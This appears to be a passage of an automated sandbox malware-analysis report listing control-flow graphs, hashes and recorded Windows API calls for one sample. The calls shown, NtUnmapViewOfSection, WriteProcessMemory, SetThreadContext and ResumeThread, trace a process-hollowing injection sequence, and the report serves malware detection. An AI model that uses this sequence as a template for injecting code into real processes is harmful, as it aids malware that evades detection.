                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1600 55162d0-55162d1 1601 55162d3-551631c 1600->1601 1602 5516322-5516368 NtAllocateVirtualMemory 1600->1602 1601->1602 1605 5516371-5516396 1602->1605 1606 551636a-5516370 1602->1606 1606->1605
                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0551635B
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: 13885875ef88e01875f4dc7d5ae2a4a203c8fb292586bfba8ae3ca8f48a13497
                                        • Instruction ID: cf8d62563067a2b54365ffa61608981f6a012002e73ff01cb7c8a0a8e6534a1c
                                        • Opcode Fuzzy Hash: 13885875ef88e01875f4dc7d5ae2a4a203c8fb292586bfba8ae3ca8f48a13497
                                        • Instruction Fuzzy Hash: 2B2116B2D002099FCB10DFAAC885ADEFFF5FF48310F10842AE919A3210D775A944CBA5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1610 55162d8-5516368 NtAllocateVirtualMemory 1613 5516371-5516396 1610->1613 1614 551636a-5516370 1610->1614 1614->1613
                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(?,?,?,?,?,?), ref: 0551635B
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: f21497ab24b00f2b4235dbd4b679e29ded3af249141bc75554165b24824785f7
                                        • Instruction ID: f7b37b38f95596c230c84aa2fd5f21a606d6682fe137ab758ed72298deb4ed99
                                        • Opcode Fuzzy Hash: f21497ab24b00f2b4235dbd4b679e29ded3af249141bc75554165b24824785f7
                                        • Instruction Fuzzy Hash: CF2104B1D002599FCB10DFAAC885ADEFFF5FF48310F10842AE919A7210CB75A954CBA5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1644 5516218-5516219 1645 551621b-5516263 1644->1645 1646 551626a-5516292 NtUnmapViewOfSection 1644->1646 1645->1646 1647 5516294-551629a 1646->1647 1648 551629b-55162c0 1646->1648 1647->1648
                                        APIs
                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 05516285
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: SectionUnmapView
                                        • String ID:
                                        • API String ID: 498011366-0
                                        • Opcode ID: 51edc7ed534ecd55e1e94f4d8b3d22fbf5bf032d4c20b017a82ba6f56a8bcbbb
                                        • Instruction ID: 7d2c4932b65e62d180801f159564954fc56d25015ec2ba013c4b81bb3b7ba50f
                                        • Opcode Fuzzy Hash: 51edc7ed534ecd55e1e94f4d8b3d22fbf5bf032d4c20b017a82ba6f56a8bcbbb
                                        • Instruction Fuzzy Hash: 2E1149B1D002488FDB14DFAAC845BEEFFF5FB88324F148429D459A7650CB75A544CB94
                                        APIs
                                        • NtUnmapViewOfSection.NTDLL(?,?), ref: 05516285
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: SectionUnmapView
                                        • String ID:
                                        • API String ID: 498011366-0
                                        • Opcode ID: 6f17c870aa67a4557bf4daaf4fb43ddc53c573c2c0c8143c47a1d404cfa5e8b6
                                        • Instruction ID: 30338f190f92e13125a7478813a4b84627b155852c8f2870a8415075cd15db3b
                                        • Opcode Fuzzy Hash: 6f17c870aa67a4557bf4daaf4fb43ddc53c573c2c0c8143c47a1d404cfa5e8b6
                                        • Instruction Fuzzy Hash: 2B1128B1D002488FDB14DFAAC845BDEFFF5FB88324F208429D559A7250CB75A544CBA5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 2bf78a8-2bf78bb 1 2bf78be-2bf78e2 0->1 3 2bf7a28-2bfaf4f 1->3 4 2bf78e8-2bf78fb 1->4 729 2bfaf99-2bfafa0 3->729 5 2bf7901-2bf7904 4->5 6 2bf7a10-2bf7a1a 4->6 7 2bf7907-2bf7921 5->7 6->1 8 2bf7a20-2bf7a27 6->8 7->6 12 2bf7927-2bf7929 7->12 13 2bf792b-2bf7941 12->13 14 2bf7943-2bf7950 12->14 19 2bf7953-2bf79a7 call 2bf6c20 13->19 14->19 31 2bf79a9-2bf79ad 19->31 32 2bf79b8 19->32 35 2bf79b6 31->35 34 2bf79ba-2bf79c8 32->34 38 2bf79ca-2bf79f5 call 2bf71d8 34->38 39 2bf79f7 34->39 35->34 41 2bf79fa-2bf7a0a 38->41 39->41 41->6 41->7 730 2bfafa2-2bfafa7 729->730 731 2bfaf51-2bfaf68 729->731 732 2bfaf6a-2bfaf96 731->732 733 2bfafa8-2bfafda 731->733 732->729
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $#^q$(Acq$(o^q$, ^q$,bq$,bq$0"^q$4'^q$4c^q$Hb_q$LR^q$PH^q$Pp^q$X#^q$\;^q$\s^q$p ^q$p<^q$pBcq$p`^q$x cq$xbq$|b_q$|cq$cq$$^q$;^q$c^q
                                        • API String ID: 0-60724802
                                        • Opcode ID: 1726664a32ebb671ed27f048083463ff6cabd7f322a1d08f47b3e2295c4f92cb
                                        • Instruction ID: dca776ff0c23eff6257dee2d784c9e6fa1d24a424ef63d6cbc75f498ecce35c2
                                        • Opcode Fuzzy Hash: 1726664a32ebb671ed27f048083463ff6cabd7f322a1d08f47b3e2295c4f92cb
                                        • Instruction Fuzzy Hash: E8635E30B80218AFDB159BA4DD04B9E7BB6FB89700F1044D9E6096B3E8CB765E85CF15

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 986 2bf0d91-2bf0d9d 987 2bf0d9f-2bf0db5 986->987 988 2bf0d58-2bf0d8f 986->988 995 2bf0db7 call 2bf1f18 987->995 996 2bf0db7 call 2bf1f07 987->996 993 2bf0dbd-2bf0dbe 995->993 996->993
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q$4'^q
                                        • API String ID: 0-2697143702
                                        • Opcode ID: 5a1d4ce8da238db8f7d3780fff480543107b50be6fce45ceda2e2d7374d08718
                                        • Instruction ID: 5c3b78754316b2bab722ac5c48d7aed0441fee123acecef9c03357e3ea7c257c
                                        • Opcode Fuzzy Hash: 5a1d4ce8da238db8f7d3780fff480543107b50be6fce45ceda2e2d7374d08718
                                        • Instruction Fuzzy Hash: 57F06230A456959FCB4AEB65D5641DDBBF1DF46200B0009DAC0898B1A5DF311E4ADB41

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1438 55148a6-5514938 1440 5514943-551494a 1438->1440 1441 551493a-5514940 1438->1441 1442 5514955-551496d 1440->1442 1443 551494c-5514952 1440->1443 1441->1440 1444 551496f-551497b 1442->1444 1445 551497e-5514a31 CreateProcessInternalW 1442->1445 1443->1442 1444->1445 1448 5514a33-5514a39 1445->1448 1449 5514a3a-5514a8e 1445->1449 1448->1449 1454 5514aa0-5514aa7 1449->1454 1455 5514a90-5514a96 1449->1455 1456 5514aa9-5514ab8 1454->1456 1457 5514abe 1454->1457 1455->1454 1456->1457 1459 5514abf 1457->1459 1459->1459
                                        APIs
                                        • CreateProcessInternalW.KERNELBASE(?,?,?,?,0000000A,?,?,0000010B,?,?,?,?), ref: 05514A1E
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: CreateInternalProcess
                                        • String ID:
                                        • API String ID: 2186235152-0
                                        • Opcode ID: d7814fe65b41b5f57509897659a38e2335983c29558c528b646ac9072d5f8ed0
                                        • Instruction ID: cc697d73c054919a62fe32c7e948aa63c968e6a7040c1714ab9efb3921155edf
                                        • Opcode Fuzzy Hash: d7814fe65b41b5f57509897659a38e2335983c29558c528b646ac9072d5f8ed0
                                        • Instruction Fuzzy Hash: BC51F571D00229DFEF24CF99C940BDDBBB2BB48310F1584AAE909B7250DB359A85CF94

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1460 55a6bf0-55a6c08 1461 55a6c0a-55a6c13 1460->1461 1462 55a6c43-55a6ccc GetConsoleWindow 1460->1462 1463 55a6c21-55a6c28 1461->1463 1464 55a6c15-55a6c17 1461->1464 1472 55a6cce-55a6cd4 1462->1472 1473 55a6cd5-55a6cfa 1462->1473 1463->1462 1466 55a6c2a-55a6c42 1463->1466 1464->1463 1472->1473
                                        APIs
                                        • GetConsoleWindow.KERNELBASE ref: 055A6CBF
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1829738306.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_55a0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: ConsoleWindow
                                        • String ID:
                                        • API String ID: 2863861424-0
                                        • Opcode ID: a5fa2443d361b60643fa4a9715a32692ff6bee5fb8bdde285856c21b1c806b0f
                                        • Instruction ID: 52f06ac3f2c7ffff4d4a9ab2c6b7a765bb9e2145af0e22f4c4574de4acd325ac
                                        • Opcode Fuzzy Hash: a5fa2443d361b60643fa4a9715a32692ff6bee5fb8bdde285856c21b1c806b0f
                                        • Instruction Fuzzy Hash: C531DD72E042598FCB24DFA9C41879FFBF1FB84320F14882AC419AB240CB34A884CBD0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1618 55163aa-551642b WriteProcessMemory 1622 5516434-5516464 1618->1622 1623 551642d-5516433 1618->1623 1623->1622
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0551641E
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 200d4f525427b474cf252695e7f6b8eae8c0333d0fba01c0e54626616bcb0247
                                        • Instruction ID: e7fee39853aa08507226b4066a2de2db8f9753dc7277cb462f0a00f67f8fad93
                                        • Opcode Fuzzy Hash: 200d4f525427b474cf252695e7f6b8eae8c0333d0fba01c0e54626616bcb0247
                                        • Instruction Fuzzy Hash: 46218C728002098FDB10CF99C845BEEBFF1FF88324F148829E559A7250CB759544CBA4

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1627 55163b0-551642b WriteProcessMemory 1630 5516434-5516464 1627->1630 1631 551642d-5516433 1627->1631 1631->1630
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0551641E
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 6d138e79518023f725dd7eaaabb3c7af4eba5ebcd06517ccf854853e14742472
                                        • Instruction ID: c029afc06c9a9344836d078659d5cccb5a41ffbe2cbd67401b134b34eb4e3731
                                        • Opcode Fuzzy Hash: 6d138e79518023f725dd7eaaabb3c7af4eba5ebcd06517ccf854853e14742472
                                        • Instruction Fuzzy Hash: 351159728002498FDB10CFA9C845BEEBFF5EF88324F108429E559A7250CB799544DBA5

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1635 5516472-55164ea Wow64SetThreadContext 1639 55164f3-5516523 1635->1639 1640 55164ec-55164f2 1635->1640 1640->1639
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 055164DD
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: d52a0740a37b36ec5902d04a10709c84b53b16899933d9c4177dd3f9003c1583
                                        • Instruction ID: abd52796250a1d9a4bbe01e63f252ffb04ac321cb50413375e7ea019cf93fad9
                                        • Opcode Fuzzy Hash: d52a0740a37b36ec5902d04a10709c84b53b16899933d9c4177dd3f9003c1583
                                        • Instruction Fuzzy Hash: 51114C72C002198FDB10DFAAC4457EEBFF5FF88324F148429D559A7250CB78A544CBA5
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,?), ref: 055164DD
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 3dc5341a9f2a09f088b57cf8f2b1a2adea80d01ac7ec53952a29f376d2e30e24
                                        • Instruction ID: 4aa452aa3211c56fb8cc2f8540d6827852def7862ff25538be69c28f306ab7cc
                                        • Opcode Fuzzy Hash: 3dc5341a9f2a09f088b57cf8f2b1a2adea80d01ac7ec53952a29f376d2e30e24
                                        • Instruction Fuzzy Hash: 99114972C002198FDB10DFAAC4457EEBFF5EF88324F108429D559A7250CB78A544CBA5
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: c64ae92106e62f7d445224ae1c9b127ddd07fe7a9df0cbbd348abff0ace4955e
                                        • Instruction ID: 74ee208436af278ccb63f4dcd4551a5e11c94f6a1943a0855106a5ec879eacde
                                        • Opcode Fuzzy Hash: c64ae92106e62f7d445224ae1c9b127ddd07fe7a9df0cbbd348abff0ace4955e
                                        • Instruction Fuzzy Hash: D31146B19002488FDB20DFAAC8457DEFBF5EF88324F208829D519A7250CB75A544CB99
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1828653140.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_5510000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        • Opcode ID: 9b786297a80de371353940350d0412ea4d30faafd25794b9405357eb2e3273a5
                                        • Instruction ID: fea85a3795b491ab709bb3e0942dd222dfcceff483eed37d641c9468e99a57ba
                                        • Opcode Fuzzy Hash: 9b786297a80de371353940350d0412ea4d30faafd25794b9405357eb2e3273a5
                                        • Instruction Fuzzy Hash: C51136B1D002488FDB20DFAAC4457DEFFF5EB88324F208829D559A7250CB75A944CFA9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,bq
                                        • API String ID: 0-2474004448
                                        • Opcode ID: 0537796f98fd06fa63fd4fcabce0e681e7cf22a60255de8f65ccad3367045f2b
                                        • Instruction ID: 36eaf0aa09d4a9e8e5fc4729174d546c79ecd8fbc361c7d347f6392b4ea12e06
                                        • Opcode Fuzzy Hash: 0537796f98fd06fa63fd4fcabce0e681e7cf22a60255de8f65ccad3367045f2b
                                        • Instruction Fuzzy Hash: 64A14130B402098FCBB49A79955863E77E6AFC9701B9845E5D606CF3A8EF70CC4ACB51
                                        APIs
                                        • GetConsoleWindow.KERNELBASE ref: 055A6CBF
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1829738306.00000000055A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_55a0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID: ConsoleWindow
                                        • String ID:
                                        • API String ID: 2863861424-0
                                        • Opcode ID: 0fa7a37b330959bbcd06f4f9c17285c3722a8f7b5b6f1201151b2e0d1e4903ff
                                        • Instruction ID: 118ed886cd6f07dff1ed69b8c94d6b265c2fe4992e2a7933b9551f75ccfb5230
                                        • Opcode Fuzzy Hash: 0fa7a37b330959bbcd06f4f9c17285c3722a8f7b5b6f1201151b2e0d1e4903ff
                                        • Instruction Fuzzy Hash: 1A1136B1D002498FDB20DFAAC4457DEFBF5EB48324F248829C459A7250CB75A544CBA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: d
                                        • API String ID: 0-2564639436
                                        • Opcode ID: a078072beae0e2871c45870a5b185bf23560300e153efe79b774677822ea7af1
                                        • Instruction ID: 2672d19818932deb3f067f8f0ffab0e95b1c6e3e79125ba198e3024bcd929458
                                        • Opcode Fuzzy Hash: a078072beae0e2871c45870a5b185bf23560300e153efe79b774677822ea7af1
                                        • Instruction Fuzzy Hash: 78615B70A0060A8FCB14DF59D5C09AAF7B6FF88310714C9A9DA699771AEB30F855CF90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f1fea595cdf2642121d510e968dc04f448827378d84048409752e66303388a1c
                                        • Instruction ID: f8738d04e06847cffda3fe0599122824d6548b2c843d90316a3940a14f2153a5
                                        • Opcode Fuzzy Hash: f1fea595cdf2642121d510e968dc04f448827378d84048409752e66303388a1c
                                        • Instruction Fuzzy Hash: ADE24B34A40219DFDB15EBA0DD54BAE7B72FB89340F0084EADA0927398CB355D86DF51
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: d
                                        • API String ID: 0-2564639436
                                        • Opcode ID: a2c5f8268c588e7cc558353dcdc58393c471c2ff036da1be475f13baed658118
                                        • Instruction ID: c4440a3883b91a6803fb1772ff4cd5dab8228a2e620c37d872b4b4f66fe88814
                                        • Opcode Fuzzy Hash: a2c5f8268c588e7cc558353dcdc58393c471c2ff036da1be475f13baed658118
                                        • Instruction Fuzzy Hash: 3A411874600602DFCB24CF18D580D6AB7F2FF84304B66CA98D55A9B669D734FD5ACB80
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q
                                        • API String ID: 0-388095546
                                        • Opcode ID: 7407a01665835f5abaa1b88065bbfbec88ac6fcacdcb4ae0458c9f53b1c22193
                                        • Instruction ID: f54e6e80debbcccbb98a19bb2815eda04609c235aa4cbfedc910d3250ffa6545
                                        • Opcode Fuzzy Hash: 7407a01665835f5abaa1b88065bbfbec88ac6fcacdcb4ae0458c9f53b1c22193
                                        • Instruction Fuzzy Hash: C7110C39B402108FCB199B69D850A2BB7A7FFCC210314899ED506DB36AEF74DC068790
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4'^q
                                        • API String ID: 0-1614139903
                                        • Opcode ID: 90111c5539809b7a50fa3feb0886161327f2a38c02de5a3001d805856edce204
                                        • Instruction ID: 784de63ae85c8e344ef6c34f9e9ef834e16fc87e93325ecbca12589191aa0140
                                        • Opcode Fuzzy Hash: 90111c5539809b7a50fa3feb0886161327f2a38c02de5a3001d805856edce204
                                        • Instruction Fuzzy Hash: 10F0A4353801015FC709E768E5506AF7BE7DFCA24031849AED04ACB7A5EF24EC4B8791
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q
                                        • API String ID: 0-388095546
                                        • Opcode ID: 5667981ded136572815dddb794aed3bc47f96fc65780439ca88f145898598d77
                                        • Instruction ID: 07ec8f2e1d3dfda45ccf395249f058bf9567c435de45ec4752789ffe4d9ad324
                                        • Opcode Fuzzy Hash: 5667981ded136572815dddb794aed3bc47f96fc65780439ca88f145898598d77
                                        • Instruction Fuzzy Hash: 06F06230E001098FCB84FFB8C4512AE7FF1EF85604F2045AEC508A7245DA3149468F81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: (bq
                                        • API String ID: 0-149360118
                                        • Opcode ID: 97fcb51a2a45b69d31849c253dda4718ce613540662c20679b54d2bef8bfadbe
                                        • Instruction ID: 876f7d1cc15b0f41dcc00cc6219f4ee6c14b5569d134fc5e5cb0feae4144dac1
                                        • Opcode Fuzzy Hash: 97fcb51a2a45b69d31849c253dda4718ce613540662c20679b54d2bef8bfadbe
                                        • Instruction Fuzzy Hash: 51E0222660D2C00FD35E5778643812CBFE1DE8B10071D08EFD4C6CBA93C9281C078B16
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $^q
                                        • API String ID: 0-388095546
                                        • Opcode ID: fc3e59c89c9fa1c7e35b3593c6a830b5e7011af0121ce988fd72cf4d6138401a
                                        • Instruction ID: 4013ccc31ee0c960ce5afb59d69d28d540db34729bf7405c5efa1c5f80ac7a25
                                        • Opcode Fuzzy Hash: fc3e59c89c9fa1c7e35b3593c6a830b5e7011af0121ce988fd72cf4d6138401a
                                        • Instruction Fuzzy Hash: 32F01C70E4010D8FCB84FFB9D45126EBBF2FB88700F6045AAC509A7389EE3499428BD1
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 959a9e8f7f4d17460644f3844061a345d02201a19f5aa4d16868b0ad33656233
                                        • Instruction ID: b0e29901177bdcab121b6d11fcdba4403f520758a0f2cf5c0f7163dfb78cd7af
                                        • Opcode Fuzzy Hash: 959a9e8f7f4d17460644f3844061a345d02201a19f5aa4d16868b0ad33656233
                                        • Instruction Fuzzy Hash: 761238747006058FCB55DF29C584A6ABBF2FF89304B1584AAE506CB776DB31EC89CB50
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 55ee3b2e1db8282b5c57d579c5c1c0fb3045322692cd7fd5d77e3aea57ff4b84
                                        • Instruction ID: 4cf3451d7fb48892a35f2283a585c13e53ec25b8fb5e38ebea05d203d5b0be41
                                        • Opcode Fuzzy Hash: 55ee3b2e1db8282b5c57d579c5c1c0fb3045322692cd7fd5d77e3aea57ff4b84
                                        • Instruction Fuzzy Hash: C2B10231E001009FC701AB34D524AAEBFE2EF95350B4D86EAC51A9B355EE309D4ADBA0
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a192788d6cb62f9d01fee4be7d4d84ff06e0df369ab48e8299af1c3514199247
                                        • Instruction ID: 32943a11fed4ecc414146a3c7b484c5807f845a6f750793e801be2134d95d24d
                                        • Opcode Fuzzy Hash: a192788d6cb62f9d01fee4be7d4d84ff06e0df369ab48e8299af1c3514199247
                                        • Instruction Fuzzy Hash: 4CB16F75A406018FC705DF28D58495ABBF2FF893107058AA9D45A8B376DB30FD8ACF90
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1124400aaf9b0ab7bb31ebd46829b1c4b662e832e1ec690dce5b631ecc4dbd3b
                                        • Instruction ID: 61e7d9c6d30842706aaab20ccbc9d6298523814ec1fb997a4371c90c6a2fac52
                                        • Opcode Fuzzy Hash: 1124400aaf9b0ab7bb31ebd46829b1c4b662e832e1ec690dce5b631ecc4dbd3b
                                        • Instruction Fuzzy Hash: CF91C631A002459FDB11DF68D484BAEBBF2FF49304F0585A9E555AB3A1DB30EC49CB91
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.1815327433.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_2bf0000_Mon17eac6d534bfd22c7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
